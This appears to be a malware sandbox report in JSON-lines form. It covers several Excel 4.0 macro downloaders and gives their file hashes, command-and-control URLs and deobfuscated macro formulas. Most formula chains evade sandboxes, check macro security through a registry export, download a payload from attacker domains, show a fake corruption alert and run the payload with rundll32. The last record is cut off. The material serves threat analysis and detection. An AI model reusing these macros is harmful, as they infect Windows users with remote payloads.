{"version":"0.2","sample":{"sample":"","kind":"file","target":"979f4c777f8d3285d2bc3a6f7bd2b90cebf7b94050eefeff559db9f1a3df2fb6"},"analysis":{"reported":"2020-04-09T16:17:51Z","score":10},"files":[{"filename":"979f4c777f8d3285d2bc3a6f7bd2b90cebf7b94050eefeff559db9f1a3df2fb6","filesize":225280,"md5":"910f6674f235ad076486e1a13502b505","sha1":"93510f67b192e7160e7c5dc942edf6ea1ec5d55b","sha256":"979f4c777f8d3285d2bc3a6f7bd2b90cebf7b94050eefeff559db9f1a3df2fb6","sha512":"810388536f80e4f8529874189da8957b34fcccf61db3bfdf42f8497e28d176a6f1360bbcb7665fecf7f44c09346550f8c334ca65bcaf27c44c07bd51e6760c41","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"979f4c777f8d3285d2bc3a6f7bd2b90cebf7b94050eefeff559db9f1a3df2fb6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jUc4J6Bopg\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97ab3db6256eed0df9b2d92a0da724c1d490ae3ff9416e49dfdfed846041f55c"},"analysis":{"reported":"2020-04-09T16:17:51Z","score":10},"files":[{"filename":"97ab3db6256eed0df9b2d92a0da724c1d490ae3ff9416e49dfdfed846041f55c","filesize":170496,"md5":"d7605cbd9d72f7b90d2646cb9a275000","sha1":"80513b6a0034c7b538f906ea2c7e9878ae2b3953","sha256":"97ab3db6256eed0df9b2d92a0da724c1d490ae3ff9416e49dfdfed846041f55c","sha512":"2c8091efe2d581d6f4bb21cff284ce38d6ff832e1ac7775de1d0be849ab6b86f7982879c5ddc2c05e473586258dacb2f0ae25c865096f844aa2c25e79ed6b0e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97ab3db6256eed0df9b2d92a0da724c1d490ae3ff9416e49dfdfed846041f55c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uVkcWXJYeB\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97b1433dc49dfefbedb7bb13ed390a7b18d333db54aacbd5073e03950cc4e401"},"analysis":{"reported":"2020-04-09T16:17:51Z","score":10},"files":[{"filename":"97b1433dc49dfefbedb7bb13ed390a7b18d333db54aacbd5073e03950cc4e401","filesize":141312,"md5":"3056fb4e4453de0d72ee0f8e4ed5dc6e","sha1":"036c664c3f3bea1eafe427a64fd653c7656f6005","sha256":"97b1433dc49dfefbedb7bb13ed390a7b18d333db54aacbd5073e03950cc4e401","sha512":"bd6c839a04e3d28ba8bdbd724adda2239920709b8fd10278a785956be86ae91efd1d1789726a2a4093fad8a44c08d73f86dd8b1e2c286a0b23a33249e3cfb4a6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97b1433dc49dfefbedb7bb13ed390a7b18d333db54aacbd5073e03950cc4e401.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"fh3Vhno1cS\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97b3d5b2dfdc35187d1f8df4e791ae0a4419d5c31344d285b7dae49ed9726bdb"},"analysis":{"reported":"2020-04-09T16:17:51Z","score":10},"files":[{"filename":"97b3d5b2dfdc35187d1f8df4e791ae0a4419d5c31344d285b7dae49ed9726bdb","filesize":147456,"md5":"2d83e2dba784e1a4cd646b6ee416deef","sha1":"c5b5920ba7c5451ba2a5803b95ee2fb3d81e6c65","sha256":"97b3d5b2dfdc35187d1f8df4e791ae0a4419d5c31344d285b7dae49ed9726bdb","sha512":"d5508b36e49d709bcc446cbe57b3c4520963663ef20e97bae13603d6628e7ff9fc9eb752744e7d596d25f748416f567ad81234cf859d9ea38296f2ed7de2d2a8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97b3d5b2dfdc35187d1f8df4e791ae0a4419d5c31344d285b7dae49ed9726bdb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fibercemper.com/wild.ex"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\pQbVnkH\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\pQbVnkH\\dCtpCSh\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fibercemper.com/wild.ex\",\"C:\\pQbVnkH\\dCtpCSh\\DqzXSvx.exe\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"C:\\pQbVnkH\\dCtpCSh\\DqzXSvx.exe\",,0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97b3e4b35ecdf1fcbc7cf439cb712507c5d2b80e5988d9b529114994ad1c774a"},"analysis":{"reported":"2020-04-09T16:17:52Z","score":10},"files":[{"filename":"97b3e4b35ecdf1fcbc7cf439cb712507c5d2b80e5988d9b529114994ad1c774a","filesize":167936,"md5":"af3d6f024ca02478c62beb77da944890","sha1":"1f2c567717892e2b938d58dbf77a1daff5f1ef1b","sha256":"97b3e4b35ecdf1fcbc7cf439cb712507c5d2b80e5988d9b529114994ad1c774a","sha512":"e6a25f13b96573424821a9bb80abae3b67992b1ebb277c6c7afa65348762b7381124342f52c3ad5599ee7954126618251e241cc892bc2e156494e615a04e56f4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97b3e4b35ecdf1fcbc7cf439cb712507c5d2b80e5988d9b529114994ad1c774a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VSLZdjvUme\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97c2a86d9bc6832db9a98968212fcb6170f286f5d361729b1d96bd84a1224b0b"},"analysis":{"reported":"2020-04-09T16:17:52Z","score":10},"files":[{"filename":"97c2a86d9bc6832db9a98968212fcb6170f286f5d361729b1d96bd84a1224b0b","filesize":167936,"md5":"0a2c0f8b5f8b908956d7c4ffb3435f46","sha1":"3d1ed2495398eea20e2b45f6b720bedf9328b680","sha256":"97c2a86d9bc6832db9a98968212fcb6170f286f5d361729b1d96bd84a1224b0b","sha512":"eb74b562e3e7ab489eada939fd98eec8efdeb39ee7b042af8e05f2accbafa9681dfc9867c5750c3aff2833bb31aac5a934d02b8acc1268bc9f50911fa9ff07fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97c2a86d9bc6832db9a98968212fcb6170f286f5d361729b1d96bd84a1224b0b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AfN5B4uGiC\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97cc2a5b48cf6fc56b1e7377a58c09af2f88203cb43f17f06a2669282e0e51f5"},"analysis":{"reported":"2020-04-09T16:17:52Z","score":10},"files":[{"filename":"97cc2a5b48cf6fc56b1e7377a58c09af2f88203cb43f17f06a2669282e0e51f5","filesize":209920,"md5":"a1751bf1782223f6fe38fe86abaff5a4","sha1":"99d804b89bada443da7a31198778948095ce1aa9","sha256":"97cc2a5b48cf6fc56b1e7377a58c09af2f88203cb43f17f06a2669282e0e51f5","sha512":"3572fa8ca0475a268472ff393f881424c954d22a8cb7b6fd40a6ff1d73014f0ffc2d925ec0c1956aa0ea016bec3a032a2e937e69f78c9fd9c02b7db355f6f0ea","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97cc2a5b48cf6fc56b1e7377a58c09af2f88203cb43f17f06a2669282e0e51f5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"amshUbUAH8\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97d8639b89aaf489f87e7e0dd7bc860e8877a60e5fc786c9f00d277b5cf4c49c"},"analysis":{"reported":"2020-04-09T16:17:52Z","score":10},"files":[{"filename":"97d8639b89aaf489f87e7e0dd7bc860e8877a60e5fc786c9f00d277b5cf4c49c","filesize":113664,"md5":"d19528cdca43db1be5e3f3b87a37e74c","sha1":"04d9843df2fe0e682295083d288e48f227fe6bdf","sha256":"97d8639b89aaf489f87e7e0dd7bc860e8877a60e5fc786c9f00d277b5cf4c49c","sha512":"7a3ac8bade2e0dae3c3563aabe21c095edf09eb504147574f5a62ce84d3e06fb67c21ef8d4f14e0563237c9109ca31c0f2aa9f4dd3266a49d68b0116741f22bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97d8639b89aaf489f87e7e0dd7bc860e8877a60e5fc786c9f00d277b5cf4c49c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8ZEZKHJQkf\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97e4160e1f2bc5f4c3e67afb51fb9d9b39f22c8c0aec76a54d7d3832495eab65"},"analysis":{"reported":"2020-04-09T16:17:52Z","score":10},"files":[{"filename":"97e4160e1f2bc5f4c3e67afb51fb9d9b39f22c8c0aec76a54d7d3832495eab65","filesize":160768,"md5":"bf85210b30096c66997a1d31addcf45f","sha1":"bb6d10f31f51b6aae28a619f88bf5d5fac722934","sha256":"97e4160e1f2bc5f4c3e67afb51fb9d9b39f22c8c0aec76a54d7d3832495eab65","sha512":"1d9282427221f56a13aa5924faa93d2e20110fc3a60457acc571f613cfafbebda9635d23b5b300044161b4b9293e7a41e045616324fb4d451b0e52e6acfea60a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97e4160e1f2bc5f4c3e67afb51fb9d9b39f22c8c0aec76a54d7d3832495eab65.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RRhu7pTpjB\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97e49debec26ddbbfb35ca4c02050daf2c95574d1e31d12e841dd9acc33a9bc5"},"analysis":{"reported":"2020-04-09T16:17:52Z","score":10},"files":[{"filename":"97e49debec26ddbbfb35ca4c02050daf2c95574d1e31d12e841dd9acc33a9bc5","filesize":185344,"md5":"31732f8f0632d4f3c3e2402f53d03036","sha1":"9b7ae30edeea3e1e7ed9b4ede8449c2f92240286","sha256":"97e49debec26ddbbfb35ca4c02050daf2c95574d1e31d12e841dd9acc33a9bc5","sha512":"ce06808c7dbc1442d704c0387512ce6a909c90cb1108850c0ce7dd8050b70171866f9dbb75fe33798eb509be7a0b7050dc5eff10ed551529656bc408c5797bea","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97e49debec26ddbbfb35ca4c02050daf2c95574d1e31d12e841dd9acc33a9bc5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97f20797cc46aa5521e40ef98c78415b3a2699048cef52ec3d5120fa1ad25391"},"analysis":{"reported":"2020-04-09T16:17:52Z","score":10},"files":[{"filename":"97f20797cc46aa5521e40ef98c78415b3a2699048cef52ec3d5120fa1ad25391","filesize":167936,"md5":"617cc788f732bf912d76814bb7a55e8c","sha1":"9833396680008c9a3aadac637a54e41a567bb0de","sha256":"97f20797cc46aa5521e40ef98c78415b3a2699048cef52ec3d5120fa1ad25391","sha512":"61cfb4b13cc2c700083ef23f7350f1a01df896de7046d3b5d50d429c89a64b80d5d01c3128a718f842d13aca39cbe13162523c95cd5b58bcfa250f962769089c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97f20797cc46aa5521e40ef98c78415b3a2699048cef52ec3d5120fa1ad25391.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UIZBmYyEZI\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97fae0348592221d68f175c82a7e502e85044b37c8dd7576a33017a9afdd6c93"},"analysis":{"reported":"2020-04-09T16:17:52Z","score":10},"files":[{"filename":"97fae0348592221d68f175c82a7e502e85044b37c8dd7576a33017a9afdd6c93","filesize":221184,"md5":"31d06fcf75c9bdd73b61ac4c5f9b2a4b","sha1":"ba218fa5c72f3be575f0c9305ef1db6c151407b8","sha256":"97fae0348592221d68f175c82a7e502e85044b37c8dd7576a33017a9afdd6c93","sha512":"8a87df73ee0a651bd2b2f0d4c777592c43e0ea96ed31af0b912547bc6f2e90763bd5ae4f5a7d09231b4267e910708a82056bf9f3eed367c753c6c1a90258ec46","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97fae0348592221d68f175c82a7e502e85044b37c8dd7576a33017a9afdd6c93.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gw8YG1zN2f\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"97fef248f0785c7371c7892d03afbc9bc3cd0f4eee82b494555a42b596865be9"},"analysis":{"reported":"2020-04-09T16:17:52Z","score":10},"files":[{"filename":"97fef248f0785c7371c7892d03afbc9bc3cd0f4eee82b494555a42b596865be9","filesize":209920,"md5":"88639dbd140d1e6fb13c79fa905c7c38","sha1":"2c57850abe3a83a1c9a624bc9b23609e572781a5","sha256":"97fef248f0785c7371c7892d03afbc9bc3cd0f4eee82b494555a42b596865be9","sha512":"142cd5b3747213a36dc8ee16abc2e6597f0b1daac67fe00fb99c42e3b4524ebb9f49d616dbac2bf8e26cf537099317cae56b39980cec59394b145ab5338908b4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"97fef248f0785c7371c7892d03afbc9bc3cd0f4eee82b494555a42b596865be9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4sdFjRyT5S\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"980e1c0e60589971e9d9a2bdb53bd6f375976bf01fa879f5695f5c258a47ad24"},"analysis":{"reported":"2020-04-09T16:17:52Z","score":10},"files":[{"filename":"980e1c0e60589971e9d9a2bdb53bd6f375976bf01fa879f5695f5c258a47ad24","filesize":177152,"md5":"43526f9a0653073266dcfcfedfc17773","sha1":"0be6c21c907da8e84f01f934647ab7d8d7f71a86","sha256":"980e1c0e60589971e9d9a2bdb53bd6f375976bf01fa879f5695f5c258a47ad24","sha512":"f87c38b3d8b333ee66416d0779e0007dfdfd6c32bdfed4c6ac40f48980cb74647ca917c85ac9683ff37c4a1f8bf472258a3e67e744cf546ab325587f61624a48","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"980e1c0e60589971e9d9a2bdb53bd6f375976bf01fa879f5695f5c258a47ad24.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"b9rARD2DAV\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"98337465630884727f6acf2aa3053a816901bc6a61a6a79c82bf28c15ed35248"},"analysis":{"reported":"2020-04-09T16:17:52Z","score":10},"files":[{"filename":"98337465630884727f6acf2aa3053a816901bc6a61a6a79c82bf28c15ed35248","filesize":161280,"md5":"f9e6c17fd243a0c7485942d93b80cf14","sha1":"00052c4011459ba89385d60ee807fc689ed6d984","sha256":"98337465630884727f6acf2aa3053a816901bc6a61a6a79c82bf28c15ed35248","sha512":"b30ea49a8e69d8d801bef0da8d75c62677cea1810a38f7fde39907cc119a4cd8826607029b91b38afbab56a596ae82747f00e5a19e9649dcffb00e74b0c2605f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"98337465630884727f6acf2aa3053a816901bc6a61a6a79c82bf28c15ed35248.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg 